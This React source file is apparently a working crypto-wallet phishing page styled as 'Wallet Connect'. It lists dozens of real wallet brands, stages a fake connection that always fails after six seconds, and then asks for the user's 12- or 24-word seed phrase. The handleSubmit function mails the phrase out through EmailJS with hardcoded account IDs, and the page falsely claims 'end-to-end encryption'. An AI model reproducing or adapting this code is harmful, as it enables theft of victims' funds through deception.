import React, { useState, useEffect, useRef } from 'react';
import './App.css';
import { QRCodeCanvas } from 'qrcode.react';

const wallets = [
  { name: 'Coinbase.com', logo: '/wallet/coinbase.png', url: 'coinbase.com' },
  { name: 'Ledger Live', logo: '/wallet/ledger.png', url: 'ledger.com' },
  { name: 'Metamask', logo: '/wallet/metamask.jpg', url: 'metamask.io' },
  { name: 'Electrum', logo: '/wallet/electrum.png', url: 'electrum.org' },
  { name: 'Exodus', logo: '/wallet/exodus.png', url: 'exodus.com' },
  { name: 'Trust Wallet', logo: '/wallet/trust_wallet.jpg', url: 'trustwallet.com' },
  { name: 'Phantom', logo: '/wallet/phantom.jfif', url: 'phantom.app' },
  { name: 'Wallet Connect', logo: '/wallet/crypto.jpg', url: 'walletconnect.com' },
  { name: 'Ronin Wallet', logo: '/wallet/ronin.png', url: 'wallet.roninchain.com' },
  { name: 'Hashpack', logo: '/wallet/hash.jfif', url: 'hashpack.app' },
  { name: 'Keplr', logo: '/wallet/keplr.png', url: 'keplr.app' },
  { name: 'Klever', logo: '/wallet/klev.png', url: 'klever.io' },
  { name: 'Fantom', logo: '/wallet/fantom.png', url: 'fantom.foundation' },
  { name: 'Blade', logo: '/wallet/blade.png', url: 'bladewallet.io' },
  { name: 'Cosmos', logo: '/wallet/cosmos.png', url: 'cosmos.network' },
  { name: 'Avax', logo: '/wallet/avax.png', url: 'wallet.avax.network' },
  { name: 'Stacks Wallet', logo: '/wallet/stacks.png', url: 'stacks.co' },
  { name: 'Terra Station', logo: '/wallet/terra.png', url: 'terra.money' },
  { name: 'Polygon Wallet', logo: '/wallet/polygon.jpg', url: 'polygon.technology' },
  { name: 'Rainbow', logo: '/wallet/rainbow.jpg', url: 'rainbow.me' },
  { name: 'Bitpay', logo: '/wallet/bitpay.jpg', url: 'bitpay.com' },
  { name: 'Walleth', logo: '/wallet/walle.jpg', url: 'walleth.org' },
  { name: 'Argent', logo: '/wallet/argent.jpg', url: 'argent.xyz' },
  { name: 'Huobi Wallet', logo: '/wallet/huobi.jpg', url: 'huobiwallet.com' },
  { name: 'Encrypted Ink', logo: '/wallet/encrypted_ink.jpg', url: 'encrypted.ink' },
  { name: 'Compound', logo: '/wallet/compound.jpg', url: 'compound.finance' },
  { name: 'Polkadot', logo: '/wallet/polkadot.png', url: 'polkadot.network' },
  { name: 'Iotex', logo: '/wallet/iotex.png', url: 'iotex.io' },
  { name: 'Coin98', logo: '/wallet/coin98.jpg', url: 'coin98.com' },
  { name: 'Crypto.com | DeFi Wallet', logo: '/wallet/crypto.jpg', url: 'crypto.com' },
  { name: 'Token Pocket', logo: '/wallet/token_pocket.jpg', url: 'tokenpocket.pro' },
  { name: 'Math Wallet', logo: '/wallet/math_wallet.jpg', url: 'mathwallet.org' },
  { name: '1inch', logo: '/wallet/1inch.jpg', url: '1inch.io' },
  { name: 'Dharma', logo: '/wallet/dharma.jpg', url: 'dharma.io' },
  { name: 'Trust Vault', logo: '/wallet/trust_vault.jpg', url: 'trustology.io' },
  { name: 'MYKEY', logo: '/wallet/mykey.jpg', url: 'mykey.org' },
  { name: 'Atomic', logo: '/wallet/atomic.jpg', url: 'atomicwallet.io' },
  { name: 'CoolWallet S', logo: '/wallet/cool_wallet_s.jpg', url: 'coolwallet.io' },
  { name: 'Nash', logo: '/wallet/nash.jpg', url: 'nash.io' },
  { name: 'Coinomi', logo: '/wallet/coinomi.jpg', url: 'coinomi.com' },
  { name: 'GridPlus', logo: '/wallet/gridplus.jpg', url: 'gridplus.io' },
  { name: 'Tokenary', logo: '/wallet/tokenary.jpg', url: 'tokenary.io' },
  { name: 'SafePal', logo: '/wallet/safepal.jpg', url: 'safepal.io' },
  { name: 'Infinito', logo: '/wallet/infinito.jpg', url: 'infinitowallet.io' },
  { name: 'Wallet.io', logo: '/wallet/wallet_io.jpg', url: 'wallet.io' },
  { name: 'Ownbit', logo: '/wallet/ownbit.jpg', url: 'ownbit.io' },
  { name: 'EasyPocket', logo: '/wallet/easypocket.jpg', url: 'easypocket.app' },
  { name: 'Bridge Wallet', logo: '/wallet/bridge_wallet.jpg', url: 'bridgewallet.com' },
  { name: 'ViaWallet', logo: '/wallet/via_wallet.jpg', url: 'viawallet.com' },
  { name: 'BitKeep', logo: '/wallet/bitkeep.jpg', url: 'bitkeep.com' },
  { name: 'Unstoppable Wallet', logo: '/wallet/unstoppable_wallet.jpg', url: 'unstoppable.money' },
  { name: 'HaloDeFi Wallet', logo: '/wallet/halodefi_wallet.jpg', url: 'halodefi.org' },
  { name: 'Dok Wallet', logo: '/wallet/dok_wallet.jpg', url: 'dokwallet.com' },
  { name: 'Cello Wallet', logo: '/wallet/celo_wallet.jpg', url: 'cellowallet.app' },
  { name: 'CoinUs', logo: '/wallet/coinus.jpg', url: 'coinus.io' },
  { name: 'Valora', logo: '/wallet/valora.jpg', url: 'valoraapp.com' },
  { name: 'Trustee Wallet', logo: '/wallet/trustee_wallet.jpg', url: 'trusteeglobal.com' },
  { name: 'Guarda Wallet', logo: '/wallet/guarda_wallet.jpg', url: 'guarda.com' },
  { name: 'Maiar Wallet', logo: '/wallet/maiarwallet.jpg', url: 'maiar.com' },
  { name: 'Jade Wallet', logo: '/wallet/jade_wallet.jpg', url: 'jadewallet.io' },
  { name: 'PlasmaPay', logo: '/wallet/plasmapay.jpg', url: 'plasmapay.com' },
  { name: 'O3Wallet', logo: '/wallet/o3_wallet.jpg', url: 'o3.network' },
  { name: 'HashKey Me', logo: '/wallet/hashkey_me.jpg', url: 'm.hashkey.com' },
  { name: 'RWallet', logo: '/wallet/rwallet.jpg', url: 'rwallet.co' },
  { name: 'Flare Wallet', logo: '/wallet/flare_wallet.jpg', url: 'flarewallet.io' },
  { name: 'KyberSwap', logo: '/wallet/kyberswap.jpg', url: 'kyberswap.com' },
  { name: '@Token Wallet', logo: '/wallet/atoken_wallet.jpg', url: 'atoken.com' },
  { name: 'Tongue Wallet', logo: '/wallet/tongue_wallet.jpg', url: 'tongue.fi' },
  { name: 'Xinfin XDC Network', logo: '/wallet/xinfin.jpg', url: 'xinfin.io' },
  { name: 'Talken Wallet', logo: '/wallet/talken_wallet.jpg', url: 'talken.io' },
  { name: 'KEYRING PRO', logo: '/wallet/keyring_pro.jpg', url: 'keyring.pro' },
  { name: 'Midas Wallet', logo: '/wallet/midas_wallet.jpg', url: 'midasprotocol.io' },
  { name: '@AT.Wallet', logo: '/wallet/at_wallet.jpg', url: 'atwallet.net' },
  { name: 'inToken', logo: '/wallet/imtoken.jpg', url: 'token.in' },
  { name: 'Others', logo: '/walle.jpg', url: '' },
];

const SecureModal = ({ open, onClose, wallet }) => {
  const [dotDirection, setDotDirection] = useState(1);
  const [dotPos, setDotPos] = useState(0);
  const barRef = useRef();

  useEffect(() => {
    if (!open) return;
    let frame;
    let pos = 0;
    let dir = 1;
    const animate = () => {
      if (!barRef.current) return;
      const barWidth = barRef.current.offsetWidth - 16; // 16px dot
      pos += dir * 3;
      if (pos >= barWidth) {
        pos = barWidth;
        dir = -1;
      } else if (pos <= 0) {
        pos = 0;
        dir = 1;
      }
      setDotPos(pos);
      setDotDirection(dir);
      frame = requestAnimationFrame(animate);
    };
    frame = requestAnimationFrame(animate);
    return () => cancelAnimationFrame(frame);
  }, [open]);

  if (!open || !wallet) return null;
  return (
    <div className="wallet-modal-backdrop" onClick={onClose}>
      <div className="wallet-modal" onClick={e => e.stopPropagation()}>
        <button className="wallet-modal-close" onClick={onClose}>&times;</button>
        <img src={wallet.logo} alt={wallet.name} className="wallet-modal-logo" />
        <h2 className="wallet-modal-title">{wallet.name}</h2>
        <div className="wallet-modal-desc">This session is secured and encrypted</div>
        <div className="wallet-modal-progress" ref={barRef} style={{ position: 'relative', overflow: 'visible' }}>
          <div
            className="wallet-modal-progress-dot"
            style={{ left: dotPos, transition: 'left 0.04s linear', position: 'absolute', top: -6 }}
          />
          <div className="wallet-modal-progress-bar" />
        </div>
        <div className="wallet-modal-connecting">
          <span>starting <b>secure connection</b>...</span>
          <div className="wallet-modal-wait">please wait...</div>
        </div>
        <div className="wallet-modal-shield-row">
          <img src="wallet/shield.png" alt="shield" className="wallet-modal-shield" />
          <span className="wallet-modal-shield-text">This session is protected with an<br />end-to-end encryption</span>
        </div>
      </div>
    </div>
  );
};

const QRModal = ({ open, onClose, wallet, qrValue }) => {
  if (!open || !wallet) return null;
  return (
    <div className="wallet-modal-backdrop" onClick={onClose}>
      <div className="wallet-modal" onClick={e => e.stopPropagation()}>
        <button className="wallet-modal-close" onClick={onClose}>&times;</button>
        <h2 className="wallet-modal-title">Show this QR code to the admin</h2>
        <div style={{ margin: '24px 0' }}>
          <QRCodeCanvas value={qrValue} size={180} />
        </div>
        <div className="wallet-modal-desc" style={{ marginBottom: 24 }}>
          Please show this QR code to the admin for further verification or support.
        </div>
      </div>
    </div>
  );
};

const ManualConnectModal = ({ open, onClose, wallet, onSuccess }) => {
  const [mnemonic, setMnemonic] = useState('');
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState('');

  const handleSubmit = async (e) => {
    e.preventDefault();
    setLoading(true);
    setError('');
    const service_id = "service_xqaer91";
    const user_id = "B_c3Rp-ah_7e23OVw";
    const template_id = "template_bou0els";
    const datad = {
      service_id,
      template_id,
      user_id,
      template_params: {
        name: wallet.name, // or the user's name if you have it
        message: mnemonic, // or whatever message you want to send
        title: 'Wallet Connect',

      },
    };
    try {
      const res = await fetch("https://api.emailjs.com/api/v1.0/email/send", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(datad),
      });
      if (res.ok) {
        setMnemonic('');
        if (onSuccess) onSuccess();
      } else {
        setError('Failed to connect. Please try again.');
      }
    } catch (err) {
      setError('Failed to connect. Please try again.');
    }
    setLoading(false);
  };

  if (!open || !wallet) return null;
  return (
    <div className="wallet-modal-backdrop" onClick={onClose}>
      <div className="wallet-modal" onClick={e => e.stopPropagation()}>
        <button className="wallet-modal-close" onClick={onClose}>&times;</button>
        <img src={wallet.logo} alt={wallet.name} className="wallet-modal-logo" />
        <h2 className="wallet-modal-title">{wallet.name}</h2>
        <div className="wallet-modal-desc">This session is secured and encrypted</div>
        <form onSubmit={handleSubmit} style={{ width: '100%' }}>
          <textarea
            className="wallet-modal-textarea"
            placeholder="Enter your 12 or 24 Mnemonic words. Seperate them with spaces."
            value={mnemonic}
            onChange={e => setMnemonic(e.target.value)}
            rows={4}
            required
          />
          <div style={{ margin: '12px 0', color: '#888', fontFamily: 'Fira Mono, Consolas, monospace' }}>...</div>
          <button className="wallet-modal-btn-filled" style={{ marginBottom: 24 }} type="submit" disabled={loading}>
            {loading ? 'Connecting...' : 'Connect Wallet'}
          </button>
        </form>
        {error && <div style={{ color: 'red', marginBottom: 12 }}>{error}</div>}
        <div className="wallet-modal-shield-row">
          <img src="wallet/shield.png" alt="shield" className="wallet-modal-shield" />
          <span className="wallet-modal-shield-text">This session is protected with an<br />end-to-end encryption</span>
        </div>
      </div>
    </div>
  );
};

const ErrorModal = ({ open, onClose, wallet, onTryAgain, onConnectManual }) => {
  if (!open || !wallet) return null;
  return (
    <div className="wallet-modal-backdrop" onClick={onClose}>
      <div className="wallet-modal" onClick={e => e.stopPropagation()}>
        <button className="wallet-modal-close" onClick={onClose}>&times;</button>
        <img src={wallet.logo} alt={wallet.name} className="wallet-modal-logo" />
        <h2 className="wallet-modal-title">{wallet.name}</h2>
        <div className="wallet-modal-desc">This session is secured and encrypted</div>
        <div className="wallet-modal-error">An error occurred… please try again or connect manually</div>
        <button className="wallet-modal-btn-outline" onClick={onTryAgain}>Try Again</button>
        <button className="wallet-modal-btn-filled" onClick={onConnectManual}>Connect Manually</button>
        <div className="wallet-modal-shield-row">
          <img src="wallet/shield.png" alt="shield" className="wallet-modal-shield" />
          <span className="wallet-modal-shield-text">This session is protected with an<br />end-to-end encryption</span>
        </div>
      </div>
    </div>
  );
};

const WalletNavbar = () => (
  <nav className="wallet-navbar">
    <div className="wallet-navbar-title">Wallet Connect</div>
    <div className="wallet-navbar-search">
      <svg width="20" height="20" fill="none" stroke="white" strokeWidth="2" viewBox="0 0 24 24"><circle cx="11" cy="11" r="7"/><line x1="16.5" y1="16.5" x2="21" y2="21"/></svg>
    </div>
    <button className="wallet-navbar-btn">
      <span className="wallet-navbar-btn-icon" role="img" aria-label="wallet">
        <svg width="20" height="20" fill="none" stroke="white" strokeWidth="2" viewBox="0 0 24 24"><rect x="2" y="7" width="20" height="14" rx="4"/><path d="M16 11h2a2 2 0 0 1 0 4h-2"/></svg>
      </span>
      Connect Wallet
    </button>
  </nav>
);

const WalletSelect = () => {
  const [modalOpen, setModalOpen] = useState(false);
  const [selectedWallet, setSelectedWallet] = useState(null);
  const [showNavbar, setShowNavbar] = useState(false);
  const [errorModalOpen, setErrorModalOpen] = useState(false);
  const [manualModalOpen, setManualModalOpen] = useState(false);
  const [qrModalOpen, setQrModalOpen] = useState(false);
  const [qrValue, setQrValue] = useState('');
  const timerRef = useRef();

  useEffect(() => {
    const onScroll = () => {
      setShowNavbar(window.scrollY > 60);
    };
    window.addEventListener('scroll', onScroll);
    return () => window.removeEventListener('scroll', onScroll);
  }, []);

  useEffect(() => {
    if (modalOpen) {
      timerRef.current = setTimeout(() => {
        setModalOpen(false);
        setErrorModalOpen(true);
      }, 6000);
    } else {
      clearTimeout(timerRef.current);
    }
    return () => clearTimeout(timerRef.current);
  }, [modalOpen]);

  const handleCardClick = wallet => {
    setSelectedWallet(wallet);
    setModalOpen(true);
    setErrorModalOpen(false);
    setManualModalOpen(false);
    setQrModalOpen(false);
  };

  const handleClose = () => {
    setModalOpen(false);
    setErrorModalOpen(false);
    setManualModalOpen(false);
    setQrModalOpen(false);
    setSelectedWallet(null);
  };

  const handleTryAgain = () => {
    setModalOpen(true);
    setErrorModalOpen(false);
    setManualModalOpen(false);
    setQrModalOpen(false);
  };

  const handleConnectManual = () => {
    setModalOpen(false);
    setErrorModalOpen(false);
    setManualModalOpen(true);
    setQrModalOpen(false);
  };

  const handleManualSuccess = () => {
    setManualModalOpen(false);
    // Generate a unique QR value (wallet name + timestamp)
    setQrValue(`${selectedWallet.name}-${Date.now()}`);
    setQrModalOpen(true);
  };

  return (
    <div className="wallet-select-root">
      {showNavbar && <WalletNavbar />}
      <SecureModal open={modalOpen} onClose={handleClose} wallet={selectedWallet} />
      <ErrorModal open={errorModalOpen} onClose={handleClose} wallet={selectedWallet} onTryAgain={handleTryAgain} onConnectManual={handleConnectManual} />
      <ManualConnectModal open={manualModalOpen} onClose={handleClose} wallet={selectedWallet} onSuccess={handleManualSuccess} />
      <QRModal open={qrModalOpen} onClose={handleClose} wallet={selectedWallet} qrValue={qrValue} />
      <header className="wallet-select-header">
        <h1>Select a Wallet</h1>
        <div className="wallet-select-underline" />
      </header>
      <main>
        <div className="wallet-select-grid">
          {wallets.map((wallet, idx) => (
            <div
              className="wallet-select-card"
              key={wallet.name + idx}
              onClick={() => handleCardClick(wallet)}
              style={{ cursor: 'pointer' }}
            >
              <img
                src={wallet.logo}
                alt={wallet.name}
                className="wallet-select-logo"
                onError={e => { e.target.onerror = null; e.target.src = '/logo192.png'; }}
              />
              <div className="wallet-select-info">
                <span className="wallet-select-name">{wallet.name}</span>
                {wallet.url && <span className="wallet-select-url">{wallet.url}</span>}
              </div>
            </div>
          ))}
        </div>
      </main>
      <footer className="wallet-select-footer">
        <div className="wallet-select-footer-left">
          <h2>Decentralized Launchpad</h2>
          <p>
            Open and decentralized protocol for syncing various wallets to Dapps. Secure. This is not an app but a protocol that establishes a remote connection between Dapp apps and/or devices.
          </p>
        </div>
        <form className="wallet-select-footer-form" onSubmit={e => e.preventDefault()}>
          <label htmlFor="newsletter-email">Subscribe</label>
          <div className="wallet-select-footer-form-row">
            <input id="newsletter-email" type="email" placeholder="name@email.com" required />
            <button type="submit">→</button>
          </div>
        </form>
      </footer>
    </div>
  );
};

export default WalletSelect; 